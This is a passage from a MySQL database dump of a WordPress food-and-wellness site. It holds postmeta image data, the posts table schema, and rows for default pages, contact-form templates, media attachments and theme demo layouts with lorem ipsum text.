s:44:\"zoltan-tasi-vHnVtLK8rCc-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3662;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:44:\"zoltan-tasi-vHnVtLK8rCc-unsplash-768x499.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:499;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21943;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:45:\"zoltan-tasi-vHnVtLK8rCc-unsplash-1536x998.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:998;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62413;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:46:\"zoltan-tasi-vHnVtLK8rCc-unsplash-2048x1331.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1331;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98907;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:44:\"zoltan-tasi-vHnVtLK8rCc-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19976;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:45:\"zoltan-tasi-vHnVtLK8rCc-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31167;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:45:\"zoltan-tasi-vHnVtLK8rCc-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27162;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:46:\"zoltan-tasi-vHnVtLK8rCc-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55666;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:36:\"zoltan-tasi-vHnVtLK8rCc-unsplash.jpg\";}'),(15005,5654,'_edit_last','1'),(14986,5606,'_thumbnail_id','5607'),(14987,5606,'_edit_last','3'),(14988,5606,'qodef_page_content_behind_header_meta','no'),(14989,5606,'qodef_boxed_background_image_attachment_meta','fixed'),(14990,5606,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/zoltan-tasi-vHnVtLK8rCc-unsplash-scaled.jpg'),(14991,5606,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14992,5606,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14993,5606,'qodef_video_type_meta','social_networks'),(14994,5606,'qodef_audio_type_meta','social_networks'),(14995,5606,'qodef_post_skin','qodef-post-light-skin'),(14996,5606,'qodef_disable_vertical_header_background_image_meta','no'),(14997,5606,'qodef_disable_header_widget_logo_area_meta','no'),(14998,5606,'qodef_disable_header_widget_menu_area_meta','no'),(15001,5506,'_oembed_time_a0a9b1300ab4dbedd2d1d10f1f077623','1695123790'); /*!40000 ALTER TABLE `wpvt_postmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_posts` -- DROP TABLE IF EXISTS `wpvt_posts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_posts` ( `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `post_author` bigint(20) unsigned NOT NULL DEFAULT 0, `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content` longtext NOT NULL, `post_title` text NOT NULL, `post_excerpt` text NOT NULL, `post_status` varchar(20) NOT NULL DEFAULT 'publish', `comment_status` varchar(20) NOT NULL DEFAULT 'open', `ping_status` varchar(20) NOT NULL DEFAULT 'open', `post_password` varchar(255) NOT NULL DEFAULT '', `post_name` varchar(200) NOT NULL DEFAULT '', `to_ping` text NOT NULL, `pinged` text NOT NULL, `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content_filtered` longtext NOT NULL, `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0, `guid` varchar(255) NOT NULL DEFAULT '', `menu_order` int(11) NOT NULL DEFAULT 0, `post_type` varchar(20) NOT NULL DEFAULT 'post', `post_mime_type` varchar(100) NOT NULL DEFAULT '', `comment_count` bigint(20) NOT NULL DEFAULT 0, PRIMARY KEY (`ID`), KEY `post_name` (`post_name`(191)), KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`), KEY `post_parent` (`post_parent`), KEY `post_author` (`post_author`) ) ENGINE=MyISAM AUTO_INCREMENT=5789 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_posts` -- LOCK TABLES `wpvt_posts` WRITE; /*!40000 ALTER TABLE `wpvt_posts` DISABLE KEYS */; INSERT INTO `wpvt_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (2,1,'2020-03-30 20:59:10','2020-03-30 20:59:10','\n

This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:

\n\n\n\n

Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)

\n\n\n\n

...or something like this:

\n\n\n\n

The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.

\n\n\n\n

As a new WordPress user, you should go to your dashboard to delete this page and create new pages for your content. Have fun!

\n','Sample Page','','publish','closed','open','','sample-page','','','2020-03-30 20:59:10','2020-03-30 20:59:10','',0,'http://tummyrevolution.com/?page_id=2',0,'page','',0),(3,1,'2020-03-30 20:59:10','2020-03-30 20:59:10','

Who we are

Our website address is: http://tummyrevolution.com.

What personal data we collect and why we collect it

Comments

When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor’s IP address and browser user agent string to help spam detection.

An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.

Media

If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.

Contact forms

Cookies

If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.

If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.

When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select "Remember Me", your login will persist for two weeks. If you log out of your account, the login cookies will be removed.

If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.

Embedded content from other websites

Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.

These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.

Analytics

Who we share your data with

How long we retain your data

If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.

For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.

What rights you have over your data

If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.

Where we send your data

Visitor comments may be checked through an automated spam detection service.

Your contact information

Additional information

How we protect your data

What data breach procedures we have in place

What third parties we receive data from

What automated decision making and/or profiling we do with user data

Industry regulatory disclosure requirements

','Privacy Policy','','draft','closed','open','','privacy-policy','','','2020-03-30 20:59:10','2020-03-30 20:59:10','',0,'http://tummyrevolution.com/?page_id=3',0,'page','',0),(6,1,'2017-12-18 13:29:43','2017-12-18 13:29:43','','Shop List','','publish','closed','closed','','shop-list','','','2017-12-18 13:29:43','2017-12-18 13:29:43','',0,'http://succulents.select-themes.com/shop/',0,'page','',0),(7,1,'2020-03-30 21:12:06','2020-03-30 21:12:06','\n\n\n\n\n\n\n\n[submit \"Send\"]\nMy Blog \"[your-subject]\"\nMy Blog \nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on My Blog (http://tummyrevolution.com)\nadmin@tummyrevolution.co.uk\nReply-To: [your-email]\n\n0\n0\n\nMy Blog \"[your-subject]\"\nMy Blog \nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on My Blog (http://tummyrevolution.com)\n[your-email]\nReply-To: admin@tummyrevolution.co.uk\n\n0\n0\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2020-03-30 21:12:06','2020-03-30 21:12:06','',0,'http://tummyrevolution.com/?post_type=wpcf7_contact_form&p=7',0,'wpcf7_contact_form','',0),(8,1,'2020-03-30 21:12:11','2020-03-30 21:12:11','','woocommerce-placeholder','','inherit','open','closed','','woocommerce-placeholder','','','2020-03-30 21:12:11','2020-03-30 21:12:11','',0,'http://tummyrevolution.com/wp-content/uploads/2020/03/woocommerce-placeholder.png',0,'attachment','image/png',0),(9,1,'2017-12-18 13:29:43','2017-12-18 13:29:43','[woocommerce_my_account]','My account','','publish','closed','closed','','my-account','','','2017-12-18 13:29:43','2017-12-18 13:29:43','',0,'http://succulents.select-themes.com/my-account/',0,'page','',0),(10,2,'2018-01-17 14:42:09','2018-01-17 14:42:09','[vc_row][vc_column width=\"1/2\"][rev_slider alias=\"home1\"][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519125565610{padding-top: 96px !important;padding-bottom: 12px !important;}\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0px 10px 0px 10px\" item_padding_680_768=\"0px 0px 60px 0px\" item_padding_680=\"0px 0px 14px 45px\"][qodef_single_image enable_image_shadow=\"no\" image=\"129\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-9 vc_col-md-offset-0 vc_col-md-9 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0px 0px 80px 8px\" item_padding_680=\"28px 0px 76px 0px\"][vc_column_text]\n
SWEET & HEALTHY FOOD
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516619115957{margin-top: -6px !important;}\"]\n

Think With Heart

\n[/vc_column_text][vc_empty_space height=\"10px\"][qodef_single_image enable_image_shadow=\"no\" image=\"130\"][vc_empty_space height=\"5px\"][vc_column_text]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using \'Content here, content here\', making it look like readable English. Many desktop publishing packages and web page.[/vc_column_text][vc_empty_space height=\"48px\"][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" image_behavior=\"custom-link\" number_of_columns=\"three\" space_between_items=\"small\" images=\"3951,3952,3953\" image_size=\"full\" custom_links=\"http://succulents.select-themes.com/summer-booze/, http://succulents.select-themes.com/fruit-salad/, http://succulents.select-themes.com/coconut-bombs/\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1519140627330{padding-top: 144px !important;padding-bottom: 0px !important;}\" parallax_background_image=\"2278\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"164\" image_size=\"full\"][vc_column_text]\n

Make Every Bite Count

\n[/vc_column_text][vc_empty_space height=\"35px\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 26% 150px 26%\" item_padding_768_1024=\"0 16% 164px 16%\" item_padding_680_768=\"0 4% 186px 4%\" item_padding_680=\"0 0% 150px 0%\"][contact-form-7 id=\"159\" html_class=\"cf7_custom_style_1\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column offset=\"vc_col-lg-5 vc_col-md-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"120px 10px 110px 0px\" item_padding_680_768=\"120px 10px 0px 0px\" item_padding_768_1024=\"120px 10px 55px 0px\" item_padding_680=\"100px 0px 28px 0px\"][qodef_single_image enable_image_shadow=\"no\" image=\"184\" image_size=\"full\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-7 vc_col-md-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"99px 0px 0px 0px\" item_padding_680=\"0px 0px 100px 0px\" item_padding_680_768=\"48px 0px 100px 0px\" item_padding_768_1024=\"0px 0px 103px 0px\"][vc_column_text]\n
SWEET & HEALTHY FOOD
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516618148023{margin-top: -11px !important;}\"]\n

Detox Plan SEVEN

\n[/vc_column_text][vc_empty_space height=\"6px\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Mauris porta euismod lectus, finibus viverra dolor congue vitae. Integer ornare vulputate nunc et semper. Pellentesque consequat erat eros, sed maximus eros luctus eget, unc dapibus.[/vc_column_text][vc_empty_space height=\"18px\"][qodef_progress_bar title_tag=\"\" percent=\"38\" title=\"Aloe Shots\"][qodef_progress_bar title_tag=\"\" percent=\"53\" title=\"Smoothies\"][qodef_progress_bar title_tag=\"\" percent=\"67\" title=\"Veggie Wraps\"][qodef_progress_bar title_tag=\"\" percent=\"81\" title=\"Supplements\"][vc_empty_space height=\"49px\"][qodef_single_image enable_image_shadow=\"no\" image=\"291\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1519125692374{padding-top: 82px !important;padding-bottom: 73px !important;background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/02/h1-img10.jpg?id=2753) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column][vc_row_inner row_content_width=\"grid\" content_text_aligment=\"center\"][vc_column_inner width=\"2/3\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-2 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image=\"3414\" image_size=\"full\" title=\"Detox Diet\" text=\"Lorem ipsum dolor sit amet, quot essent eam ei. Sed epicurei liberavisse in, vis fugit apeirian philosophia ad.\" background_text=\"1\"][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner width=\"2/3\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-2 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image=\"3415\" image_size=\"full\" title=\"Strong Excercize\" text=\"Lorem ipsum dolor sit amet, quot essent eam ei. Sed epicurei liberavisse in, vis fugit apeirian philosophia ad.\" background_text=\"2\"][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner width=\"2/3\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-2 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image=\"3412\" image_size=\"full\" title=\"Deep Hydration\" text=\"Lorem ipsum dolor sit amet, quot essent eam ei. Sed epicurei liberavisse in, vis fugit apeirian philosophia ad.\" background_text=\"3\"][vc_empty_space height=\"40px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" parallax_background_image=\"2285\" css=\".vc_custom_1518176405299{padding-top: 57px !important;padding-bottom: 132px !important;}\"][vc_column][qodef_testimonials skin=\"light\" show_title=\"no\" show_image=\"no\" show_icon=\"yes\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"no\" slider_pagination=\"yes\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519124684606{padding-top: 88px !important;padding-bottom: 112px !important;}\"][vc_column][qodef_product_list number_of_columns=\"4\" space_between_items=\"tiny\" orderby=\"title\" order=\"ASC\" taxonomy_to_display=\"id\" image_size=\"\" number_of_posts=\"8\" taxonomy_values=\"1099, 1100, 1102, 1103, 1104, 1105, 1106, 1107\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" parallax_background_image=\"245\" css=\".vc_custom_1519121697188{padding-bottom: 30px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"23px 20px 60px 0px\" item_padding_680=\"100px 0px 0px 0px\" item_padding_680_768=\"100px 0 0 0\" item_padding_768_1024=\"100px 123px 0px 0px\" item_padding_1024_1280=\"0px 0% 23px 84px\"][vc_column_text css_animation=\"none\"]\n
SWEET & HEALTHY FOOD
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516615809885{margin-top: -10px !important;}\"]\n

Organic Soap

\n[/vc_column_text][vc_empty_space height=\"8px\"][vc_column_text]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.[/vc_column_text][vc_empty_space height=\"28px\"][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"130px 0px 99px 88px\" item_padding_680=\"50px 0px 90px 0px\" item_padding_680_768=\"71px 0 100px 0px\" item_padding_768_1024=\"77px 0px 100px 0px\"][qodef_video_button video_link=\"https://vimeo.com/28781336\" video_image=\"246\" play_button_size=\"20px\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1519124340678{padding-top: 85px !important;}\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"166\" image_size=\"full\"][vc_empty_space height=\"13px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" title=\"Vegan Blogging\" subtitle=\"SWEET & HEALTY FOOD\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519124473237{padding-bottom: 63px !important;}\"][vc_column][vc_empty_space height=\"60px\"][qodef_blog_list type=\"standard\" number_of_columns=\"3\" space_between_items=\"small\" orderby=\"date\" order=\"DESC\" image_size=\"full\" number_of_posts=\"3\" category=\"pure\" excerpt_length=\"19\"][/vc_column][/vc_row]','Main Home','','publish','closed','closed','','main-home-2','','','2023-08-24 16:15:12','2023-08-24 16:15:12','',0,'http://succulents.select-themes.com/?page_id=10',0,'page','',0),(18,1,'2018-01-17 15:52:52','2018-01-17 15:52:52','','404-img-1','','inherit','open','closed','','404-img-1','','','2018-01-17 15:52:52','2018-01-17 15:52:52','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/404-img-1.jpg',0,'attachment','image/jpeg',0),(52,1,'2018-01-18 10:56:55','2018-01-18 10:56:55','','logo-1','','inherit','open','closed','','logo-1','','','2018-01-18 10:56:55','2018-01-18 10:56:55','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/logo-1.png',0,'attachment','image/png',0),(73,1,'2018-01-18 14:51:41','2018-01-18 14:51:41','','about-us-background','','inherit','open','closed','','about-us-background','','','2018-01-18 14:51:41','2018-01-18 14:51:41','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-background.jpg',0,'attachment','image/jpeg',0),(83,1,'2018-01-18 15:08:25','2018-01-18 15:08:25','','about-us-img-1','','inherit','open','closed','','about-us-img-1','','','2018-01-18 15:08:25','2018-01-18 15:08:25','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-img-1.png',0,'attachment','image/png',0),(88,1,'2018-01-19 09:11:09','2018-01-19 09:11:09','','about-us-img-3','','inherit','open','closed','','about-us-img-3','','','2018-01-19 09:11:09','2018-01-19 09:11:09','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-img-3.png',0,'attachment','image/png',0),(91,1,'2018-01-19 09:29:13','2018-01-19 09:29:13','','testimonials-background','','inherit','open','closed','','testimonials-background','','','2018-01-19 09:29:13','2018-01-19 09:29:13','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/testimonials-background.jpg',0,'attachment','image/jpeg',0),(93,1,'2018-01-19 09:30:47','2018-01-19 09:30:47','','t1','','publish','closed','closed','','t1','','','2018-01-19 09:30:47','2018-01-19 09:30:47','',0,'http://succulents.select-themes.com/?post_type=testimonials&p=93',0,'testimonials','',0),(112,1,'2018-01-19 09:56:58','2018-01-19 09:56:58','','about-us-gallery-img-4','','inherit','open','closed','','about-us-gallery-img-4','','','2018-01-19 09:56:58','2018-01-19 09:56:58','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-gallery-img-4.jpg',0,'attachment','image/jpeg',0),(124,1,'2018-01-19 10:10:47','2018-01-19 10:10:47','','tabs-background','','inherit','open','closed','','tabs-background','','','2018-01-19 10:10:47','2018-01-19 10:10:47','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/tabs-background-1.jpg',0,'attachment','image/jpeg',0),(129,1,'2018-01-19 10:32:45','2018-01-19 10:32:45','','h1-img1','','inherit','open','closed','','h1-img1','','','2018-01-19 10:32:45','2018-01-19 10:32:45','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h1-img1.png',0,'attachment','image/png',0),(130,1,'2018-01-19 10:35:10','2018-01-19 10:35:10','','h1-img2','','inherit','open','closed','','h1-img2','','','2018-01-19 10:35:10','2018-01-19 10:35:10','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h1-img2-1.png',0,'attachment','image/png',0),(142,1,'2018-01-19 11:05:16','2018-01-19 11:05:16','','about-us-gallery-img-1','','inherit','open','closed','','about-us-gallery-img-1','','','2018-01-19 11:05:16','2018-01-19 11:05:16','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-gallery-img-1-1.jpg',0,'attachment','image/jpeg',0),(143,1,'2018-01-19 11:05:24','2018-01-19 11:05:24','','about-us-gallery-img-2','','inherit','open','closed','','about-us-gallery-img-2','','','2018-01-19 11:05:24','2018-01-19 11:05:24','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-gallery-img-2-1.jpg',0,'attachment','image/jpeg',0),(144,1,'2018-01-19 11:05:29','2018-01-19 11:05:29','','about-us-gallery-img-3','','inherit','open','closed','','about-us-gallery-img-3','','','2018-01-19 11:05:29','2018-01-19 11:05:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-gallery-img-3.jpg',0,'attachment','image/jpeg',0),(145,1,'2018-01-19 11:06:53','2018-01-19 11:06:53','','about-us-gallery-img-5','','inherit','open','closed','','about-us-gallery-img-5','','','2018-01-19 11:06:53','2018-01-19 11:06:53','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-gallery-img-5.jpg',0,'attachment','image/jpeg',0),(154,1,'2018-01-19 12:12:55','2018-01-19 12:12:55','','about-us-img-2','','inherit','open','closed','','about-us-img-2','','','2018-01-19 12:12:55','2018-01-19 12:12:55','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/about-us-img-2.png',0,'attachment','image/png',0),(159,1,'2018-01-19 12:23:39','2018-01-19 12:23:39','
\r\n\r\n\r\n[email* your-email][submit class:button primary “Submit”]\r\n\r\n
\n1\nTummyRevolution \"[your-subject]\"\n[your-name] \ninfo@tummyrevolution.com\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n-- \r\nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\n\n\n\n\n\nSucculents \"[your-subject]\"\nSucculents \n[your-email]\nMessage Body:\r\n[your-message]\r\n\r\n-- \r\nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\nReply-To: succulents@select-themes.com\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThe date format is incorrect.\nThe date is before the earliest one allowed.\nThe date is after the latest one allowed.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.\nThe number format is invalid.\nThe number is smaller than the minimum allowed.\nThe number is larger than the maximum allowed.\nThe answer to the quiz is incorrect.\nThe e-mail address entered is invalid.\nThe URL is invalid.\nThe telephone number is invalid.','Newsletter Form','','publish','closed','closed','','newsletter-form','','','2020-04-17 01:53:01','2020-04-17 01:53:01','',0,'http://succulents.select-themes.com/?post_type=wpcf7_contact_form&p=159',0,'wpcf7_contact_form','',0),(164,1,'2018-01-19 12:54:26','2018-01-19 12:54:26','','h1-img7','','inherit','open','closed','','h1-img7','','','2018-01-19 12:54:26','2018-01-19 12:54:26','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h1-img7.png',0,'attachment','image/png',0),(166,1,'2018-01-19 13:47:58','2018-01-19 13:47:58','','404-title-img','','inherit','open','closed','','404-title-img','','','2018-01-19 13:47:58','2018-01-19 13:47:58','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/404-title-img.png',0,'attachment','image/png',0),(184,1,'2018-01-19 15:04:27','2018-01-19 15:04:27','','h1-img8','','inherit','open','closed','','h1-img8','','','2018-01-19 15:04:27','2018-01-19 15:04:27','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h1-img8.jpg',0,'attachment','image/jpeg',0),(192,1,'2018-01-19 15:28:04','2018-01-19 15:28:04','[vc_row full_height=\"yes\" row_content_width=\"grid\" disable_background_image=\"\" simple_background_image=\"194\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"390px 0 393px 24px\" item_padding_1280_1600=\"167px 0px 167px 24px\" item_padding_1024_1280=\"183px 0 183px 24px\" item_padding_768_1024=\"229px 0 228px 24px\" item_padding_680_768=\"318px 0 318px 24px\" item_padding_680=\"82px 0 82px 0px\"][qodef_section_title type=\"standard\" position=\"center\" subtitle_tag=\"h6\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTHY FOOD\" title=\"Coming Soon\" subtitle_color=\"#ffffff\" title_color=\"#ffffff\"][vc_empty_space height=\"9px\"][vc_column_text]\n

It is a long established fact that a reader will be distracted by the readable

\n[/vc_column_text][vc_column_text css=\".vc_custom_1519309669944{margin-top: -10px !important;}\"]\n

content of a page when looking at its layout. The point of using Lorem

